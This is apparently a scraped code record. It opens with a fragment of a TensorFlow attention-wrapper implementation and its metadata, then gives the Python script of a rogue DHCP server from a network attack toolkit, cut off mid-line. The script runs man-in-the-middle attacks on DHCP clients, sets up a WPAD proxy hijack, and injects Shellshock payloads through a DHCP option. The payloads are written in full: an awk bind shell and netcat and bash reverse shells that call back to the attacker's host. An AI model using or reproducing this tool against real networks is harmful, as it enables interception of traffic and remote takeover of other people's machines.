None) alignment_history = previous_alignment_history[i].write( state.time, alignments) if self._alignment_history else () all_attention_states.append(next_attention_state) all_alignments.append(alignments) all_attentions.append(attention) maybe_all_histories.append(alignment_history) attention = array_ops.concat(all_attentions, 1) next_state = AttentionWrapperState( time=state.time + 1, cell_state=next_cell_state, attention=attention, attention_state=self._item_or_tuple(all_attention_states), alignments=self._item_or_tuple(all_alignments), alignment_history=self._item_or_tuple(maybe_all_histories)) if self._output_attention: return attention, next_state else: return cell_output, next_state
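The record above ends with the full `AttentionWrapper` implementation. As a quick orientation, the following is a minimal usage sketch of the classes defined in that file, assuming the TF 1.x `tf.contrib.seq2seq` API the source belongs to; the tensor shapes and hyperparameters below are illustrative placeholders, not values taken from the record.

# Minimal sketch (assumed TF 1.x contrib API; shapes and hyperparameters are placeholders).
import tensorflow as tf
from tensorflow.contrib import rnn, seq2seq

batch_size, max_time, encoder_depth, num_units = 32, 50, 256, 128

# Encoder outputs act as the attention "memory"; sequence lengths mask padded steps.
encoder_outputs = tf.placeholder(tf.float32, [batch_size, max_time, encoder_depth])
sequence_length = tf.placeholder(tf.int32, [batch_size])

# BahdanauAttention projects query and memory to num_units and uses additive scoring.
attention_mechanism = seq2seq.BahdanauAttention(
    num_units=num_units,
    memory=encoder_outputs,
    memory_sequence_length=sequence_length)

# AttentionWrapper mixes the previous attention into the cell input, scores the new
# cell output against the memory, and emits the attention vector as its output.
decoder_cell = seq2seq.AttentionWrapper(
    rnn.BasicLSTMCell(num_units),
    attention_mechanism,
    attention_layer_size=num_units,
    alignment_history=True)

initial_state = decoder_cell.zero_state(batch_size, tf.float32)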
apache-2.0
-8,393,192,901,681,401,000
40.782821
94
0.670449
false
3.934828
false
false
false
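For context on the numeric fields that close each record (size, line_mean, line_max, alpha_frac, and so on), here is a hedged sketch of how such per-file statistics are commonly derived from the content string; the exact formulas used by this dataset are an assumption and are not documented in the record itself.

# Hypothetical reconstruction of the per-record statistics; the real pipeline may differ.
def file_stats(content):
    lines = content.splitlines()
    line_lengths = [len(line) for line in lines] or [0]
    alpha = sum(ch.isalpha() for ch in content)
    return {
        "size": len(content),                                # characters in the file
        "line_mean": sum(line_lengths) / len(line_lengths),  # average line length
        "line_max": max(line_lengths),                       # longest line
        "alpha_frac": alpha / max(len(content), 1),          # fraction of alphabetic characters
    }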
Vladimir-Ivanov-Git/raw-packet
Scripts/DHCP/dhcp_rogue_server.py
1
47873
#!/usr/bin/env python # region Import from sys import path from os.path import dirname, abspath project_root_path = dirname(dirname(dirname(abspath(__file__)))) utils_path = project_root_path + "/Utils/" path.append(utils_path) from base import Base from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw from tm import ThreadManager from scanner import Scanner from sys import exit from argparse import ArgumentParser from ipaddress import IPv4Address from socket import socket, AF_PACKET, SOCK_RAW, htons from os import errno, makedirs from shutil import copyfile from base64 import b64encode from netaddr import IPAddress from time import sleep from random import randint import subprocess as sub # endregion # region Check user, platform and create threads Base = Base() Scanner = Scanner() Base.check_user() Base.check_platform() tm = ThreadManager(3) # endregion # region Parse script arguments parser = ArgumentParser(description='DHCP Rogue server') parser.add_argument('-i', '--interface', help='Set interface name for send reply packets') parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None) parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None) parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None) parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None) parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None) parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None) parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None) parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None) parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None) parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None) parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None) parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None) parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local") parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800) parser.add_argument('-s', '--send_discover', action='store_true', help='Send DHCP discover packets in the background thread') parser.add_argument('-r', '--discover_rand_mac', action='store_true', help='Use random MAC address for source MAC address in DHCP discover packets') parser.add_argument('-d', '--discover_delay', type=float, help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5) parser.add_argument('-O', '--shellshock_option_code', type=int, help='Set dhcp option code for inject shellshock payload, default=114', default=114) parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client') parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client') parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)', default=1234) parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse 
tcp shell in DHCP client') parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client') parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client') parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen bind shell (default=443)', default=443) parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload') parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload') parser.add_argument('--ip_path', type=str, help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/") parser.add_argument('--iface_name', type=str, help='Set iface name in shellshock payload, default = eth0', default="eth0") parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response') parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets') parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack') parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output') args = parser.parse_args() # endregion # region Print banner if argument quit is not set if not args.quiet: Base.print_banner() # endregion # region Set global variables eth = Ethernet_raw() arp = ARP_raw() ip = IP_raw() udp = UDP_raw() dhcp = DHCP_raw() first_offer_ip_address = None last_offer_ip_address = None network_mask = None target_mac_address = None target_ip_address = None dhcp_server_mac_address = None dhcp_server_ip_address = None router_ip_address = None dns_server_ip_address = None tftp_server_ip_address = None wins_server_ip_address = None wpad_url = None dhcp_discover_packets_source_mac = None free_ip_addresses = [] clients = {} shellshock_url = None domain = None payload = None SOCK = None discover_sender_is_work = False # endregion # region Get your network settings if args.interface is None: Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...") current_network_interface = Base.netiface_selection(args.interface) your_mac_address = Base.get_netiface_mac_address(current_network_interface) if your_mac_address is None: Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!") exit(1) your_ip_address = Base.get_netiface_ip_address(current_network_interface) if your_ip_address is None: Base.print_error("Network interface: ", current_network_interface, " do not have IP address!") exit(1) your_network_mask = Base.get_netiface_netmask(current_network_interface) if your_network_mask is None: Base.print_error("Network interface: ", current_network_interface, " do not have network mask!") exit(1) if args.netmask is None: network_mask = your_network_mask else: network_mask = args.netmask # endregion # region Create raw socket SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) # endregion # region Get first and last IP address in your network first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1) last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1) # endregion # region Set target MAC and IP address, if target IP is not set - get first and last offer IP if args.target_mac is not None: target_mac_address = str(args.target_mac).lower() # region Target IP is set if args.target_ip is not None: if 
args.target_mac is not None: if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip, "; target IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: target_ip_address = args.target_ip else: Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" + ", for target IP address: ", args.target_ip) exit(1) # Set default first offer IP and last offer IP first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1) last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1) # endregion # region Target IP is not set - get first and last offer IP else: # Check first offer IP address if args.first_offer_ip is None: first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1) else: if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip, "; first IP address in your network: ", first_ip_address) exit(1) else: first_offer_ip_address = args.first_offer_ip # Check last offer IP address if args.last_offer_ip is None: last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1) else: if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip, "; last IP address in your network: ", last_ip_address) exit(1) else: last_offer_ip_address = args.last_offer_ip # endregion # endregion # region Set DHCP sever MAC and IP address if args.dhcp_mac is None: dhcp_server_mac_address = your_mac_address else: dhcp_server_mac_address = args.dhcp_mac if args.dhcp_ip is None: dhcp_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address): Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip, "; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: dhcp_server_ip_address = args.dhcp_ip # endregion # region Set router, dns, tftp, wins IP address # Set router IP address if args.router is None: router_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address): Base.print_error("Bad value `--router`: ", args.router, "; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: router_ip_address = args.router # Set DNS server IP address if args.dns is None: dns_server_ip_address = your_ip_address else: if not Base.ip_address_validation(args.dns): Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns) exit(1) else: dns_server_ip_address = args.dns # Set TFTP server IP address if args.tftp is None: tftp_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address): Base.print_error("Bad value `--tftp`: ", args.tftp, "; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: tftp_server_ip_address = args.tftp # Set WINS server IP address if args.wins is None: wins_server_ip_address = your_ip_address else: if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address): Base.print_error("Bad value `--wins`: ", args.tftp, "; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address) exit(1) else: wins_server_ip_address = args.wins # endregion # region 
Set proxy if args.proxy is not None: # Set variables wpad_url = "http://" + your_ip_address + "/wpad.dat" apache2_sites_available_dir = "/etc/apache2/sites-available/" apache2_sites_path = "/var/www/html/" wpad_path = apache2_sites_path + "wpad/" # Apache2 sites settings default_site_file_name = "000-default.conf" default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w') default_site_file.write("<VirtualHost *:80>\n" + "\tServerAdmin admin@wpad.com\n" + "\tDocumentRoot " + wpad_path + "\n" + "\t<Directory " + wpad_path + ">\n" + "\t\tOptions FollowSymLinks\n" + "\t\tAllowOverride None\n" + "\t\tOrder allow,deny\n" + "\t\tAllow from all\n" + "\t</Directory>\n" + "</VirtualHost>\n") default_site_file.close() # Create dir with wpad.dat script try: makedirs(wpad_path) except OSError: Base.print_info("Path: ", wpad_path, " already exist") except: Base.print_error("Something else went wrong while trying to create path: ", wpad_path) exit(1) # Copy wpad.dat script wpad_script_name = "wpad.dat" wpad_script_src = utils_path + wpad_script_name wpad_script_dst = wpad_path + wpad_script_name copyfile(src=wpad_script_src, dst=wpad_script_dst) # Read redirect script with open(wpad_script_dst, 'r') as redirect_script: content = redirect_script.read() # Replace the Proxy URL content = content.replace('proxy_url', args.proxy) # Write redirect script with open(wpad_script_dst, 'w') as redirect_script: redirect_script.write(content) # Restart Apache2 server try: Base.print_info("Restarting apache2 server ...") sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True) except OSError as e: if e.errno == errno.ENOENT: Base.print_error("Program: ", "service", " is not installed!") exit(1) else: Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`") exit(2) # Check apache2 is running sleep(2) apache2_pid = Base.get_process_pid("apache2") if apache2_pid == -1: Base.print_error("Apache2 server is not running!") exit(1) else: Base.print_info("Apache2 server is running, PID: ", str(apache2_pid)) # endregion # region Set Shellshock option code if 255 < args.shellshock_option_code < 0: Base.print_error("Bad value: ", args.shellshock_option_code, "in DHCP option code! 
This value should be in the range from 1 to 254") exit(1) # endregion # region Set search domain domain = bytes(args.domain) # endregion # region General output if not args.quiet: Base.print_info("Network interface: ", current_network_interface) Base.print_info("Your IP address: ", your_ip_address) Base.print_info("Your MAC address: ", your_mac_address) if target_mac_address is not None: Base.print_info("Target MAC: ", target_mac_address) # If target IP address is set print target IP, else print first and last offer IP if target_ip_address is not None: Base.print_info("Target IP: ", target_ip_address) else: Base.print_info("First offer IP: ", first_offer_ip_address) Base.print_info("Last offer IP: ", last_offer_ip_address) Base.print_info("DHCP server mac address: ", dhcp_server_mac_address) Base.print_info("DHCP server ip address: ", dhcp_server_ip_address) Base.print_info("Router IP address: ", router_ip_address) Base.print_info("DNS server IP address: ", dns_server_ip_address) Base.print_info("TFTP server IP address: ", tftp_server_ip_address) if args.proxy is not None: Base.print_info("Proxy url: ", args.proxy) # endregion # region Get free IP addresses in local network def get_free_ip_addresses(): global Scanner # Get all IP addresses in range from first to last offer IP address current_ip_address = first_offer_ip_address while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)): free_ip_addresses.append(current_ip_address) current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1) Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...") localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface) for ip_address in localnet_ip_addresses: try: free_ip_addresses.remove(ip_address) except ValueError: pass # endregion # region Add client info in global clients dictionary def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False): if this_client_already_in_dictionary: clients[client_mac_address].update(client_info) else: clients[client_mac_address] = client_info # endregion # region Make DHCP offer packet def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None): if destination_mac is None: destination_mac = "ff:ff:ff:ff:ff:ff" if destination_ip is None: destination_ip = "255.255.255.255" return dhcp.make_response_packet(source_mac=dhcp_server_mac_address, destination_mac=destination_mac, source_ip=dhcp_server_ip_address, destination_ip=destination_ip, transaction_id=transaction_id, your_ip=offer_ip, client_mac=client_mac, dhcp_server_id=dhcp_server_ip_address, lease_time=args.lease_time, netmask=network_mask, router=router_ip_address, dns=dns_server_ip_address, dhcp_operation=2, payload=None) # endregion # region Make DHCP ack packet def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None): if destination_mac is None: destination_mac = "ff:ff:ff:ff:ff:ff" if destination_ip is None: destination_ip = "255.255.255.255" return dhcp.make_response_packet(source_mac=dhcp_server_mac_address, destination_mac=destination_mac, source_ip=dhcp_server_ip_address, destination_ip=destination_ip, transaction_id=transaction_id, your_ip=target_ip, client_mac=target_mac, dhcp_server_id=dhcp_server_ip_address, lease_time=args.lease_time, netmask=network_mask, router=router_ip_address, dns=dns_server_ip_address, dhcp_operation=5, payload=shellshock_url, 
proxy=bytes(wpad_url), domain=domain, tftp=tftp_server_ip_address, wins=wins_server_ip_address, payload_option_code=args.shellshock_option_code) # endregion # region Make DHCP nak packet def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip): return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address, destination_mac=target_mac, source_ip=dhcp_server_ip_address, destination_ip=requested_ip, transaction_id=transaction_id, your_ip=target_ip, client_mac=target_mac, dhcp_server_id=dhcp_server_ip_address) # endregion # def ack_sender(): # SOCK = socket(AF_PACKET, SOCK_RAW) # SOCK.bind((current_network_interface, 0)) # ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address) # while True: # SOCK.send(ack_packet) # sleep(0.01) # region Send DHCP discover packets def discover_sender(number_of_packets=999999): global discover_sender_is_work discover_sender_is_work = True packet_index = 0 SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) if dhcp_discover_packets_source_mac != your_mac_address: relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface) while packet_index < number_of_packets: try: discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac, client_mac=eth.get_random_mac(), host_name=Base.make_random_string(8), relay_ip=relay_agent_ip_address) SOCK.send(discover_packet) sleep(args.discover_delay) except: Base.print_error("Something went wrong when sending DHCP discover packets!") packet_index += 1 else: while packet_index < number_of_packets: try: discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac, client_mac=eth.get_random_mac(), host_name=Base.make_random_string(8), relay_ip=your_ip_address) SOCK.send(discover_packet) sleep(args.discover_delay) except: Base.print_error("Something went wrong when sending DHCP discover packets!") packet_index += 1 SOCK.close() discover_sender_is_work = False # endregion # region Reply to DHCP and ARP requests def reply(request): # region Define global variables global SOCK global clients global target_ip_address global router_ip_address global payload global shellshock_url global args global discover_sender_is_work # endregion # region DHCP if 'DHCP' in request.keys(): # region Get transaction id and client MAC address transaction_id = request['BOOTP']['transaction-id'] client_mac_address = request['BOOTP']['client-mac-address'] # endregion # region Check this client already in dict client_already_in_dictionary = False if client_mac_address in clients.keys(): client_already_in_dictionary = True # endregion # region DHCP DISCOVER if request['DHCP'][53] == 1: # region Print INFO message Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # endregion # If parameter "Do not send DHCP OFFER packets" is not set if not args.dnsop: # region Start DHCP discover sender if args.send_discover: if not discover_sender_is_work: discover_sender(100) # endregion # If target IP address is set - offer IP = target IP if target_ip_address is not None: offer_ip_address = target_ip_address # If target IP address is not set - offer IP = random IP from free IP addresses list else: random_index = randint(0, len(free_ip_addresses)) offer_ip_address = free_ip_addresses[random_index] # Delete offer IP from free IP addresses list del free_ip_addresses[random_index] if args.broadcast_response: offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, 
client_mac_address) else: offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address, client_mac_address, offer_ip_address) SOCK.send(offer_packet) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"transaction": transaction_id, "discover": True, "offer_ip": offer_ip_address}, client_already_in_dictionary) # Print INFO message Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address) # endregion # region DHCP RELEASE if request['DHCP'][53] == 7: if request['BOOTP']['client-ip-address'] is not None: client_ip = request['BOOTP']['client-ip-address'] Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"client_ip": client_ip}, client_already_in_dictionary) # print clients # Add release client IP in free IP addresses list if client_ip not in free_ip_addresses: free_ip_addresses.append(client_ip) else: Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"release": True}, client_already_in_dictionary) # print clients # endregion # region DHCP INFORM if request['DHCP'][53] == 8: if request['BOOTP']['client-ip-address'] is not None: client_ip = request['BOOTP']['client-ip-address'] Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # If client IP in free IP addresses list delete this if client_ip in free_ip_addresses: free_ip_addresses.remove(client_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"client_ip": client_ip}, client_already_in_dictionary) # print clients else: Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id)) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"inform": True}, client_already_in_dictionary) # print clients # endregion # region DHCP REQUEST if request['DHCP'][53] == 3: # region Set local variables requested_ip = "0.0.0.0" offer_ip = None # endregion # region Get requested IP if 50 in request['DHCP'].keys(): requested_ip = str(request['DHCP'][50]) # endregion # region Print info message Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id), " requested ip: ", requested_ip) # endregion # region Requested IP not in range from first offer IP to last offer IP if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address): Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip, " not in range: ", first_offer_ip_address + " - " + last_offer_ip_address) # endregion # region Requested IP in range from first offer IP to last offer IP else: # region Start DHCP discover sender if args.send_discover: if not discover_sender_is_work: discover_sender(100) # endregion # region Change client info in global clients dictionary # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"request": True, "requested_ip": requested_ip, "transaction": transaction_id}, client_already_in_dictionary) # Delete ARP mitm success keys in dictionary for this client clients[client_mac_address].pop('client request his ip', 
None) clients[client_mac_address].pop('client request router ip', None) clients[client_mac_address].pop('client request dns ip', None) # endregion # region Get offer IP address try: offer_ip = clients[client_mac_address]["offer_ip"] except KeyError: pass # endregion # region This client already send DHCP DISCOVER and offer IP != requested IP if offer_ip is not None and offer_ip != requested_ip: # Print error message Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip, " not like offer IP: ", offer_ip) # Create and send DHCP nak packet nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip) SOCK.send(nak_packet) Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"mitm": "error: offer ip not like requested ip", "offer_ip": None}, client_already_in_dictionary) # print clients # endregion # region Offer IP == requested IP or this is a first request from this client else: # region Target IP address is set and requested IP != target IP if target_ip_address is not None and requested_ip != target_ip_address: # Print error message Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip, " not like target IP: ", target_ip_address) # Create and send DHCP nak packet nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, target_ip_address, requested_ip) SOCK.send(nak_packet) Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"mitm": "error: target ip not like requested ip", "offer_ip": None, "nak": True}, client_already_in_dictionary) # endregion # region Target IP address is set and requested IP == target IP or Target IP is not set else: # region Settings shellshock payload # region Create payload # Network settings command in target machine net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \ str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";" # Shellshock payload: <user bash command> if args.shellshock_command is not None: payload = args.shellshock_command # Shellshock payload: # awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' & if args.bind_shell: payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \ "/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &" # Shellshock payload: # rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f & if args.nc_reverse_shell: payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \ your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &" # Shellshock payload: # /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 & if args.nce_reverse_shell: payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &" # Shellshock payload: # /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 & if args.bash_reverse_shell: payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \ "/" + str(args.reverse_port) + " 0>&1 &" if payload is not None: # Do not add network settings command in payload if not args.without_network: payload = net_settings + payload # Send payload to target in clear text if args.without_base64: shellshock_url = "() { :; }; " + payload # Send base64 encoded payload to target 
in clear text else: payload = b64encode(payload) shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")" # endregion # region Check Shellshock payload length if shellshock_url is not None: if len(shellshock_url) > 255: Base.print_error("Length of shellshock payload is very big! Current length: ", str(len(shellshock_url)), " Maximum length: ", "254") shellshock_url = "A" # endregion # endregion # region Send DHCP ack and print info message if args.broadcast_response: ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip) else: ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip, client_mac_address, requested_ip) Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip) SOCK.send(ack_packet) # endregion # region Add client info in global clients dictionary try: clients[client_mac_address].update({"mitm": "success"}) except KeyError: clients[client_mac_address] = {"mitm": "success"} # endregion # endregion # endregion # endregion # endregion # region DHCP DECLINE if request['DHCP'][53] == 4: # Get requested IP requested_ip = "0.0.0.0" if 50 in request['DHCP'].keys(): requested_ip = str(request['DHCP'][50]) # Print info message Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # If client IP in free IP addresses list delete this if requested_ip in free_ip_addresses: free_ip_addresses.remove(requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"decline_ip": requested_ip, "decline": True}, client_already_in_dictionary) # print clients # endregion # endregion DHCP # region ARP if 'ARP' in request.keys(): if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \ request['ARP']['target-mac'] == "00:00:00:00:00:00": # region Set local variables arp_sender_mac_address = request['ARP']['sender-mac'] arp_sender_ip_address = request['ARP']['sender-ip'] arp_target_ip_address = request['ARP']['target-ip'] # endregion # region Print info message Base.print_info("ARP request from: ", arp_sender_mac_address, " \"", "Who has " + arp_target_ip_address + "? 
Tell " + arp_sender_ip_address, "\"") # endregion # region Get client mitm status try: mitm_status = clients[arp_sender_mac_address]["mitm"] except KeyError: mitm_status = "" # endregion # region Get client requested ip try: requested_ip = clients[arp_sender_mac_address]["requested_ip"] except KeyError: requested_ip = "" # endregion # region Create IPv4 address conflict if mitm_status.startswith("error"): arp_reply = arp.make_response(ethernet_src_mac=your_mac_address, ethernet_dst_mac=arp_sender_mac_address, sender_mac=your_mac_address, sender_ip=arp_target_ip_address, target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address) SOCK.send(arp_reply) Base.print_info("ARP response to: ", arp_sender_mac_address, " \"", arp_target_ip_address + " is at " + your_mac_address, "\" (IPv4 address conflict)") # endregion # region MITM success if mitm_status.startswith("success"): if arp_target_ip_address == requested_ip: clients[arp_sender_mac_address].update({"client request his ip": True}) if arp_target_ip_address == router_ip_address: clients[arp_sender_mac_address].update({"client request router ip": True}) if arp_target_ip_address == dns_server_ip_address: clients[arp_sender_mac_address].update({"client request dns ip": True}) try: test = clients[arp_sender_mac_address]["client request his ip"] test = clients[arp_sender_mac_address]["client request router ip"] test = clients[arp_sender_mac_address]["client request dns ip"] try: test = clients[arp_sender_mac_address]["success message"] except KeyError: if args.exit: sleep(3) Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")") exit(0) else: Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")") clients[arp_sender_mac_address].update({"success message": True}) except KeyError: pass # endregion # endregion # endregion # region Main function if __name__ == "__main__": # region Add ip addresses in list with free ip addresses from first to last offer IP if target_ip_address is None: Base.print_info("Create list with free IP addresses in your network ...") get_free_ip_addresses() # endregion # region Send DHCP discover packets in the background thread if args.send_discover: Base.print_info("Start DHCP discover packets send in the background thread ...") if args.discover_rand_mac: dhcp_discover_packets_source_mac = eth.get_random_mac() Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac, " (random MAC address)") else: dhcp_discover_packets_source_mac = your_mac_address Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac, " (your MAC address)") Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay)) tm.add_task(discover_sender) # endregion # region Sniff network # region Create RAW socket for sniffing raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003)) # endregion # region Print info message Base.print_info("Waiting for a ARP or DHCP requests ...") # endregion # region Start sniffing while True: # region Try try: # region Sniff packets from RAW socket packets = raw_socket.recvfrom(2048) for packet in packets: # region Parse Ethernet header ethernet_header = packet[0:eth.header_length] ethernet_header_dict = eth.parse_header(ethernet_header) # endregion # region Could not parse Ethernet header - break if ethernet_header_dict is None: break # endregion # region Ethernet filter if target_mac_address is not None: if ethernet_header_dict['source'] != 
target_mac_address: break else: if ethernet_header_dict['source'] == your_mac_address: break if dhcp_discover_packets_source_mac is not None: if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac: break # endregion # region ARP packet # 2054 - Type of ARP packet (0x0806) if ethernet_header_dict['type'] == arp.packet_type: # region Parse ARP packet arp_header = packet[eth.header_length:eth.header_length + arp.packet_length] arp_packet_dict = arp.parse_packet(arp_header) # endregion # region Could not parse ARP packet - break if arp_packet_dict is None: break # endregion # region ARP filter if arp_packet_dict['opcode'] != 1: break # endregion # region Call function with full ARP packet reply({ 'Ethernet': ethernet_header_dict, 'ARP': arp_packet_dict }) # endregion # endregion # region IP packet # 2048 - Type of IP packet (0x0800) if ethernet_header_dict['type'] == ip.header_type: # region Parse IP header ip_header = packet[eth.header_length:] ip_header_dict = ip.parse_header(ip_header) # endregion # region Could not parse IP header - break if ip_header_dict is None: break # endregion # region UDP if ip_header_dict['protocol'] == udp.header_type: # region Parse UDP header udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4) udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length] udp_header_dict = 